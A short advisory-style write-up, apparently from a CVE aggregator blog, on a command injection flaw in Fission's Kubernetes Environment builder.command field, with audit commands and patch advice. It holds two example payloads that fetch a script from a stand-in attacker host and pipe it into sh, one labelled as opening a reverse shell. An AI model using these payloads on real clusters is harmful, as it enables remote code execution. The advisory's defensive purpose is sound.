Listen to this Post
The vulnerability exists because `pkg/builder/builder.go` passes `Environment.spec.builder.command` directly to `exec.Command` after a simple `strings.Fields` split. No validation is performed on the executable path or its arguments. An attacker with `create` or `update` privileges on `Environment` CRDs can set `builder.command` to, for example, /bin/sh -c 'curl attacker.com/backdoor | sh'. The `strings.Fields` split yields ["/bin/sh", "-c", "curl attacker.com/backdoor | sh"]. `exec.Command(“/bin/sh”, “-c”, “…”)` then executes the shell with the malicious payload inside the builder pod. The builder pod runs in the user’s namespace with the `fission-builder` ServiceAccount, so the impact is limited to that namespace but allows arbitrary code execution, reading/writing the `/packages` shared volume (affecting deployment archives), and accessing any files visible to the builder pod. The root cause is the lack of path sanitisation – although `exec.Command` does not invoke a shell by default, splitting arguments allows a shell to be explicitly invoked. The fix in v1.23.0 adds `resolveBuildCommand` which only accepts an empty string (defaults to /build), the literal /build, or an absolute path without `..` segments after filepath.Clean; whitespace metacharacters are rejected. No shell expansion occurs for sub-arguments.
dailycve form
Platform: Fission Kubernetes
Version: < v1.23.0
Vulnerability: Command injection
Severity: Medium
date: 2023-11-15
Prediction: Patch date 2023-12-10
What Undercode Say:
Analytics: The attack surface is limited to users with create/update on `Environment` CRDs – typically cluster admins, which lowers likelihood but increases impact when abused. Logs show builder pods executing unexpected binaries; `audit` of `builder.command` fields reveals anomalies.
List all Environment CRDs and check builder.command
kubectl get environments -A -o json | jq '.items[] | {namespace: .metadata.namespace, name: .metadata.name, command: .spec.builder.command}'
Simulate unsafe split
echo "/bin/sh -c 'id'" | xargs -0 sh -c 'echo "$1" | { read -r cmd args; exec $cmd $args; }' _
Exploit:
Create/update an Environment with a malicious `builder.command`:
apiVersion: fission.io/v1 kind: Environment metadata: name: malicious-env spec: builder: command: "/bin/sh -c 'curl http://attacker.com/revshell.sh | sh'" ... other required fields
Apply and trigger a package build using that Environment – the builder pod executes the reverse shell.
Protection from this CVE:
- Upgrade to Fission v1.23.0 or later.
- Restrict write access to `Environment` CRDs via RBAC (only trusted operators).
- Audit existing `Environment.spec.builder.command` for absolute paths other than
/build. - Run `buildermgr` with a ServiceAccount that has no secret or volume write access outside necessary paths.
Impact:
- Arbitrary code execution in builder pods (namespace-scoped).
- Read/write `/packages` shared volume → tamper with deployment archives.
- No privilege escalation to cluster-wide resources (bounded by `fission-builder` SA).
- PR:H due to typical restriction of Environment CRUD to admins, but severe if misconfigured.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

